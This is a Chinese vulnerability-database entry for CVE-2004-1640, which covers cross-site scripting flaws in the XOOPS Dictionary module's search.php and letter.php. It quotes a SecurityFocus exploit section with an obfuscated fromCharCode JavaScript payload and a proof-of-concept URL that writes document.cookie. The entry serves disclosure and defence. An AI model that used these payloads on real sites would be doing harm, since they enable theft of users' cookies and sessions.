Nagl XOOPS Dictionary模块多个跨站脚本漏洞

Nagl XOOPS Dictionary模块多个跨站脚本漏洞

漏洞ID 1108147 漏洞类型 跨站脚本
发布时间 2004-08-28 更新时间 2005-10-20
图片[1]-Nagl XOOPS Dictionary模块多个跨站脚本漏洞-安全小百科CVE编号 CVE-2004-1640
图片[2]-Nagl XOOPS Dictionary模块多个跨站脚本漏洞-安全小百科CNNVD-ID CNNVD-200408-225
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/24415
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-225
|漏洞详情
XOOPS0.94和1.0版本存在多个跨站脚本漏洞。远程攻击者借助(1)search.php的terme参数或者(2)letter.php的letter参数执行任意web脚本和HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/11064/info

Reportedly the XOOPS Dictionary Module by Nagle is affected by multiple cross-site scripting vulnerabilities. This issue is due to a failure of the application to properly sanitize user-supplied URI input.

As a result of this issue and attacker can execute arbitrary script code in the browser of an unsuspecting user by enticing the unsuspecting user to follow a malicious link.

An attacker can leverage this issue to steal cookie based authentication credentials as well as carry out other attacks. It should be noted that the impact of this issue depends on the context of the dynamic web site developed with the XOOPS software and the XOOPS dictionary module and so cannot accurately be outlined here. 

script>
function xss (){
var tag=String.fromCharCode(60)+String.fromCharCode(105)+
String.fromCharCode(109)+String.fromCharCode(103)+String.fromCharCode(32)+
String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+
String.fromCharCode(32)+String.fromCharCode(61);
var web=String.fromCharCode(104)+String.fromCharCode(116)+
String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+
String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(119)+
String.fromCharCode(119)+String.fromCharCode(119)+String.fromCharCode(46)+
String.fromCharCode(103)+String.fromCharCode(111)+String.fromCharCode(111)+
String.fromCharCode(103)+String.fromCharCode(108)+String.fromCharCode(101)+
String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+
String.fromCharCode(109);
var path=String.fromCharCode(47)+String.fromCharCode(105)+
String.fromCharCode(109)+String.fromCharCode(97)+String.fromCharCode(103)+
String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(47)+
String.fromCharCode(103)+String.fromCharCode(111)+String.fromCharCode(111)+
String.fromCharCode(103)+String.fromCharCode(108)+String.fromCharCode(101)+
String.fromCharCode(95)+String.fromCharCode(56)+String.fromCharCode(48)+
String.fromCharCode(119)+String.fromCharCode(104)+String.fromCharCode(116)+
String.fromCharCode(46)+String.fromCharCode(103)+String.fromCharCode(105)+
String.fromCharCode(102)+String.fromCharCode(62);
document.write(tag+web+path);
} xss()
</script>

The following proof of concept has been provided for the 'letter.php' script issue:

ttp://attaker/modules/dictionary/letter.php?letter="><script>document.write(document.cookie)<script>(
|参考资料

来源:XF
名称:xoops-dictionary-letter-xss(17154)
链接:http://xforce.iss.net/xforce/xfdb/17154
来源:BID
名称:11064
链接:http://www.securityfocus.com/bid/11064
来源:SECUNIA
名称:12424
链接:http://secunia.com/advisories/12424
来源:BUGTRAQ
名称:20040828CrossSiteScriptinginXOOPSVersion2.xDictionarymodule
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109394077209963&w;=2
来源:XF
名称:xoops-dictionary-search-xss(17152)
链接:http://xforce.iss.net/xforce/xfdb/17152
来源:OSVDB
名称:9394
链接:http://www.osvdb.org/9394
来源:OSVDB
名称:9393
链接:http://www.osvdb.org/9393
来源:cyruxnet.org
链接:http://cyruxnet.org/modulo_dic_xoops.htm

相关推荐: Cisco VPN 5000 Concentrator Plaintext Password

Cisco VPN 5000 Concentrator Plaintext Password 漏洞ID 1101666 漏洞类型 Design Error 发布时间 2002-08-07 更新时间 2002-08-07 CVE编号 N/A CNNVD-ID N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享